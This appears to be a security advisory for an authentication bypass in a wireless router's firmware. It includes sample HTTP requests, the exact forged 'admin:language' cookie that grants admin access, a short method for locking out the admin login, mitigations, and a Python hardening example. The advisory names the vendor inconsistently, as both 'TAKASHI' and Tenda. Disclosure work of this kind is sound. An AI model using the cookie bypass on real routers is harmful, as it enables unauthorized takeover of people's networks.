A critical authentication bypass vulnerability has been identified in the TAKASHI Wireless Instant Router and Repeater (Model A5) running firmware version V5.07.38_AAL03 with hardware version V3.0. The vulnerability allows unauthorized users to gain administrative access because of improper session management. It has also enabled a second exploit, which disables the admin panel's ability to assign cookies properly; see Admin Panel Denial of Service Exploit.
- Model: A5
- Manufacturer: Tenda
- Software Version: V5.07.38_AAL03
- Hardware Version: V3.0
Improper session management in Takashi Wireless Instant Router and Repeater (Model A5) firmware v5.07.38_AAL03 with hardware v3.0 allows unauthorized attackers to gain admin-level access via a crafted request.
To understand how this vulnerability works, let's compare an unauthenticated request to an authenticated request.
Unauthenticated request (a normal login attempt):
```http
POST /LoginCheck HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://192.168.2.1/login.asp
Content-Type: application/x-www-form-urlencoded
Content-Length: 46
Origin: http://192.168.2.1
DNT: 1
Sec-GPC: 1
Connection: keep-alive
Cookie: language=en
Upgrade-Insecure-Requests: 1
Priority: u=0, i

Username=admin&checkEn=0&Password=whatsthepassword
```
Authenticated request (treated as an admin session):
```http
GET /wireless_basic.asp HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://192.168.2.1/advance.asp
DNT: 1
Sec-GPC: 1
Connection: keep-alive
Cookie: language=en; admin:language=en
Upgrade-Insecure-Requests: 1
Priority: u=4
```
The key difference between the two requests is the presence of the following cookie:
admin:language=en
The application trusts the admin:language cookie without properly verifying session authentication. By simply adding this cookie with an arbitrary value, an unauthenticated user can gain full administrative access.
An attacker can exploit this vulnerability by setting the following cookie:
admin:language=<any_value>
Where <any_value> can be any string, text, or number. As long as the cookie is present, the application will treat the user as an authenticated admin.
The DoS exploit works because of an error in how the backup file for the router's settings is handled. If the file is edited manually, the username can be changed, even though it is not changeable when logged in to the router. This effectively disables the ability to log in without something like a proxy such as Burp Suite to intercept and alter the admin username credentials.
- Unauthorized users can gain admin-level access without valid credentials.
- Attackers can modify router settings, expose sensitive data, and potentially disrupt network operations.
- No brute-force or credential stuffing is needed—just cookie manipulation.
To mitigate this issue, the following steps should be taken:
- Proper Session Management: Implement server-side session validation instead of relying on client-side cookies.
- Token-Based Authentication: Use secure session tokens that cannot be forged.
- Session Expiry: Ensure sessions expire and require re-authentication after a set period.
- Cookie Integrity Checks: Validate cookies against an active session in the backend database.
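To make the mitigation concrete, the following added example (not the vendor's firmware code) contrasts the flawed check this advisory describes with a server-side session store that ignores client-chosen cookie names. The stored password, the session lifetime and the `session` cookie name are assumed values for the demonstration.

```python
import hmac
import secrets
import time

# Constructed stand-in for the device's stored admin credential (not a real value).
EXPECTED_PASSWORD = "correct-horse"
SESSION_TTL = 600  # seconds before a session must be re-established (assumed)
_sessions = {}  # server-side store: token -> (username, expiry)


def parse_cookies(header):
    """Split a Cookie header into a dict; names such as 'admin:language' are kept verbatim."""
    cookies = {}
    for part in header.split(";"):
        name, _, value = part.strip().partition("=")
        if name:
            cookies[name] = value
    return cookies


def vulnerable_is_admin(cookie_header):
    """The flawed check the advisory describes: the mere presence of an
    admin:language cookie, whatever its value, is treated as an admin session."""
    return "admin:language" in parse_cookies(cookie_header)


def login(username, password, now=None):
    """Issue an unguessable session token only after the credential check passes."""
    now = time.time() if now is None else now
    if username != "admin" or not hmac.compare_digest(password, EXPECTED_PASSWORD):
        return None
    token = secrets.token_urlsafe(32)
    _sessions[token] = (username, now + SESSION_TTL)
    return token


def hardened_is_admin(cookie_header, now=None):
    """Server-side validation: the session cookie must map to a live, unexpired
    entry in the store; client-supplied cookie names carry no authority."""
    now = time.time() if now is None else now
    token = parse_cookies(cookie_header).get("session")
    entry = _sessions.get(token)
    if entry is None:
        return False
    username, expiry = entry
    if now > expiry:
        del _sessions[token]  # expired sessions are discarded, forcing re-login
        return False
    return username == "admin"
```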
This vulnerability report is for educational and research purposes only. The information provided should not be used for malicious activities. Always obtain proper authorization before testing security vulnerabilities on any system.
Contributors
- William James Schleppegrell